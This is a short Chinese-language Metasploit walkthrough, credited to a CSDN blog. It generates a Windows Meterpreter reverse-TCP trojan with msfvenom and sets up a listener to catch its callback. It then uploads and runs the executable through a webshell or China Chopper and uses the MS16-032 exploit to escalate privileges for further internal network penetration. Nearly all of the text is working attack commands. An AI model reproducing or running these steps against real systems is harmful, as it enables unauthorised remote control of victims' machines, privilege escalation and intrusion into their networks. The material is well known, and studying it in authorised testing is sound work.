- 生成木马
Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe
- 配置监听程序
Msfconsole 打开Metaploit
msf > use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.184.132
Exploit
现在将1.exe 通过菜刀或者webshell 上次到可写目录,并且执行
这样就监听成功了 获得一个session (会话)
Getuid 查看主机名
shell 进入命令行模式
当然这里也可以加载exp
Exit 返回到meterpeter模式
Background 返回 multi/handler
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 加载exp
Session 1 返回之前的会话
Exploit 进行提权
这说明exp执行成功,可以进一步提权,内网渗透了
来源:CSDN
作者:沧海NO1
链接:https://blog.csdn.net/u010025272/article/details/82822717